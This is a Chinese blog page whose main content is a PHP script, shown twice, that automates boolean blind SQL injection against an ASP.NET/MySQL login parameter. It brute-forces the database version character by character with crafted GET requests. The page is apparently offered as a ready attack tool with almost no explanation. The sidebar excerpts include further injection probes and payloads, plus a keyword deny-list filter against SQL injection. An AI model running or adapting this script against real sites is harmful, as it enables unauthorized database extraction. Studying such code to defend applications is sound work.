asp.net+mysql,asp.net+mysql后台盲注入

于 2021-03-12 19:23:23 发布
阅读量49 收藏
点赞数
文章标签: asp.net+mysql

///* //9

for($i=1; $i<=9; $i++){// 猜内容

$a=1;

while($a<=120){

$sa=sList($i,$a++);

$sa =iconv("UTF-8", "GB2312//IGNORE",$sa);

echo ($i).$sa." ----".($a-1)."n";

}

}

//*/

/*

$a=0;

while ($a<50){//猜长度

$sa=sky($a++);

$sa =iconv("UTF-8", "GB2312//IGNORE",$sa);

echo $sa." ----".($a-1)."n";

}

*/

function sList($ke,$value)

{

$tmp = array();

$data = '';

$fp = @fsockopen($host,80,$errno,$errstr,60);

@fputs($fp,"GET /path/index.aspx?UserName=admin'%20and%20ascii(substring((version()),$ke,1))=".$value."%20and%20'x'='x HTTP/1.1rnHost:$hostrnConnection: Closernrn");

while ($fp && !feof($fp))

$data .= fread($fp, 102400);

@fclose($fp);

//print_r($data);

preg_match_all("@(.*?)@is",$data,$tmp);

return $tmp[1][0];

}

function sky($value){ //猜长度

$tmp = array();

$data = '';

$fp = @fsockopen($host,80,$errno,$errstr,60);

@fputs($fp,"GET /path/index.aspx?UserName=admin'%20and%20Length((version()))=$value%20and%20'x'='x HTTP/1.1rnHost:$hostrnConnection: Closernrn");

while ($fp && !feof($fp))

$data .= fread($fp, 102400);

@fclose($fp);

//print_r($data);

preg_match_all("@(.*?)@is",$data,$tmp);

return $tmp[1][0];

}

?>

///* //9

for($i=1; $i<=9; $i++){// 猜内容

$a=1;

while($a<=120){

$sa=sList($i,$a++);

$sa =iconv("UTF-8", "GB2312//IGNORE",$sa);

echo ($i).$sa." ----".($a-1)."n";

}

}

//*/

/*

$a=0;

while ($a<50){//猜长度

$sa=sky($a++);

$sa =iconv("UTF-8", "GB2312//IGNORE",$sa);

echo $sa." ----".($a-1)."n";

}

*/

function sList($ke,$value)

{

$tmp = array();

$data = '';

$fp = @fsockopen($host,80,$errno,$errstr,60);

@fputs($fp,"GET /path/index.aspx?UserName=admin'%20and%20ascii(substring((version()),$ke,1))=".$value."%20and%20'x'='x HTTP/1.1rnHost:$hostrnConnection: Closernrn");

while ($fp && !feof($fp))

$data .= fread($fp, 102400);

@fclose($fp);

//print_r($data);

preg_match_all("@(.*?)@is",$data,$tmp);

return $tmp[1][0];

}

function sky($value){ //猜长度

$tmp = array();

$data = '';

$fp = @fsockopen($host,80,$errno,$errstr,60);

@fputs($fp,"GET /path/index.aspx?UserName=admin'%20and%20Length((version()))=$value%20and%20'x'='x HTTP/1.1rnHost:$hostrnConnection: Closernrn");

while ($fp && !feof($fp))

$data .= fread($fp, 102400);

@fclose($fp);

//print_r($data);

preg_match_all("@(.*?)@is",$data,$tmp);

return $tmp[1][0];

}

?>

咸鱼cc
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
asp.net 防SQL注(非常简洁)
07-05
protected void Application_BeginRequest(object sender, EventArgs e) { //遍历Post参数,隐藏域除外 foreach (string i in this.Request.Form) { if (i == "__VIEWSTATE") continue; this.goErr(this.Request.Form[i].ToString()); } //遍历Get参数。 foreach (string i in this.Request.QueryString) { this.goErr(this.Request.QueryString[i].ToString()); } } private void goErr(string tm) { if (SqlFilter2(tm)) { Response.Write("无效的提交!"); Response.End(); } } public static bool SqlFilter2(string InText) { string word = "and|exec|insert|select|delete|update|chr|mid|master|or|truncate|char|declare|join"; if (InText == null) return false; foreach (string i in word.Split('|')) { if ((InText.ToLower().IndexOf(i + " ") > -1) || (InText.ToLower().IndexOf(" " + i) > -1)) { return true; } } return false; }
基于ASP.NET+MySQL的Web课程设计
01-22
通过这个课程设计,学生可以深理解ASP.NET的开发环境、页面生命周期、控件事件处理以及如何与MySQL数据库交互。同时,通过实现航空购票系统,可以学习到Web应用的基本架构和业务流程处理,对提升Web开发技能...
asp mysql_ASP注靶机
weixin_29157493的博客
01-26 165
ASP:Dim Db,MyDbPathdim conn'可修改设置一:========================定义数据库类别,1为SQL数据库,0为Access数据库=============================Const IsSqlDataBase =0MyDbPath = ""'================================================...
asp mysql_记一次有意义的asp手工注
weixin_35355431的博客
02-23 445
今天在空间发了篇日志,问朋友们有没有什么需要我这个小菜检测一下的网站,日志发出后,有位朋友来留了一个网站的地址:呵呵,当时听那朋友说的,他们好多人都不行,拿不下,我被吓到了,呵呵,想着别人那么多人都拿不下的站,我一个小菜鸟能拿下?呵呵,不过还是抱着试试看的心情打开了这个网站,在主站转了转,用的是CMS,由于俺是小菜,对CMS不懂,于是找到后台,看可否直接登录,后台地址为:但是,打开之后发现页面跳转...
第二部分:2.盲注的讲解
→_→
03-17 1072
何为盲注盲注就是在 sql 注过程中,sql 语句执行的选择后,选择的数据不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注。从 background-1 中,我们可以知道盲注分为三类 基于布尔 SQL 盲注 基于时间的 SQL 盲注 基于报错的 SQL 盲注 1 :基于布尔 L SQL 盲注 -------...
MYSQL手工注
netuser1937的博客
12-12 592
MYSQL手工注
基于ASP.NET+MySQL实现待办任务清单系统【100010180】
12-26
ASP.NETMySQL结合构建待办任务清单系统】 在IT领域,开发一款待办任务清单系统是常见的项目实践,这有助于提升个人或团队的工作效率。本项目“基于ASP.NET+MySQL实现待办任务清单系统”就是一个这样的实例,...
基于ASP.NET+MySQL的web订餐系统的设计与实现源代码+报告文档(高分项目)
最新发布
08-12
基于ASP.NET+MySQL的web订餐系统的设计与实现源代码+报告文档(高分项目),含有代码注释,新手也可看懂,个人手打98分项目,导师非常认可的高分项目,毕业设计、期末大作业和课程设计高分必看,下载下来,简单部署...
期末大作业-基于asp.net+mysql的图书管理系统源码.zip
06-01
期末大作业—基于asp.net+mysql的图书管理系统源码.zip期末大作业—基于asp.net+mysql的图书管理系统源码.zip期末大作业—基于asp.net+mysql的图书管理系统源码.zip期末大作业—基于asp.net+mysql的图书管理系统源码...
ASP.NET+MySQL人事管理系统
07-08
学完《ASP.NET编程》后做的综合性实验的完整备份,一个ASP.NET+MySQL的人事管理系统,是在我之前发的PHP+MySQL人事管理系统的基础上改的。 因为老师不允许用GridView等数据控件,所以都是用代码(好像是叫ADO.NET...
全面了解ASP注方法
weixin_33869377的博客
01-03 129
&gt;1.判断是否有注 ;and 1=1 ;and 1=2 2.初步判断是否是mssql ;and user&gt;0 3.注参数是字符 'and [查询条件] and ''=' 4.搜索时没过滤参数的 'and [查询条件] and '%25'=' 5.判断数据库系统 ;and (select count(*) from sysobjects)&gt;0...
SQL注盲注总汇
4ct10n
10-15 7313
最近看了一些盲注习题,在这里想总结一下吧。盲注其实可以代替任何注,但基本的注盲注简单。在这里我先解析几道盲注的习题。 1. JSOJ的题目Simple Injection 1. 首先用wvs扫描器扫描网站 发现了sql盲注漏洞 并且是sleep注 2. 利用给出的payload初步尝试/*'XOR(if(1,sleep(2),0))OR'*/ 确实有延迟效果,那么下面就是写代码了
SQL注-针对asp+access网站进行SQL注
qq_25899635的博客
05-23 4966
asp+access网站技术介绍   ASP即Active Server Pages,是MicroSoft公司开发的服务器端脚本环境,可用来创建动态交互式网页并建立强大的web应用程序。当服务器收到对ASp文件的请求时,它会处理包含在用于构建发送给浏览器的HTML(Hyper Text Markup Language,超文本标志语言)网页文件中的服务器端脚本代码。除服务器端脚本代码外,ASP文件也...
sql注盲注漏洞
liuy_uzhi的博客
07-24 1万+
1、发现和利用sql注漏洞的基本流程: 首先找到有数据库交互的功能页面---判断页面是否存在sql注--利用sql注漏洞读取数据--导出所需数据 sql 注的基本步骤(这个跟sqlmap的步骤基本一致吧) (1)判断是什么类型注,有没过滤了关键字,可否绕过 (2)获取数据库用户,版本,当前连接的数据库等信息 (3)获取某个数据库表的信息 (4)获取列信息 (5)最后就获取数据了 2...
浅谈盲注中的基于时间型和布尔型的注方法
热门推荐
pygain的博客
11-08 2万+
SQL显错注已经被用烂了像这种漏洞,漏洞批量发现工具找一找,sqlmap跑一跑。 今天讲的是在我们的命令被带数据库查询语句但是却什么都没有返回的情况我们该怎么办。例如应用程序就会返回一个“通用的”的页面,或者重定向一个通用页面(可能为网站首页)。这时,我们之前学习的SQL注办法就无法使用了。 盲注,即在SQL注过程中,SQL语句执行选择后,选择的数据不能回显到前端,我们需要使用一些特殊的方法进行判断或尝试,这个过程称为盲注
(论坛答疑点滴)有关sql注
03-12 1437
http://community.csdn.net/Expert/topic/3803/3803170.xml?temp=.6236078大家存在5点误区:1、sql注比较难防,需要替换select,delete等一打字符其实对于字符型替换再多都没有替换单引号为两个单引号来的好!对于数字型替换再多都没有用,一定要类型转换。2、忽略DropDownList传来的东西其实是不对的,一切客户端的东西都
(转)SQL盲注攻击的简单介绍
05-19 315
转:http://hi.baidu.com/duwang1104/item/65a6603056aee780c3cf2968 1 简介 1.1 普通SQL注技术概述 目前没有对SQL注技术的标准定义,微软中国技术中心从2个方面进行了描述[1]: (1) 脚本注式的攻击 (2) 恶意用户输用来影响被执行的SQL脚本 根据Chris Anle...
SQL注系列之ASP+ACCESS手动注(一)----数字型
fendo
12-30 2万+
一、access数据库 1.简介 Microsoft Office Access是由微软发布的关系数据库管理系统。它结合了 MicrosoftJet Database Engine 和 图形用户界面两项特点,是 Microsoft Office 的系统程序之一。 Microsoft Office Access是微软把数据库引擎的图形用户界面和软件开发工具结合在一起的一
asp.net +mysql 源代码
11-29
ASP.NET 是一种用于构建网站和 web 应用程序的开发框架,而 MySQL 是一个流行的开源关系型数据库系统。当使用 ASP.NETMySQL 结合时,我们通常会创建一个 web 应用程序,其中包含 ASP.NET 的源代码和与 MySQL ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值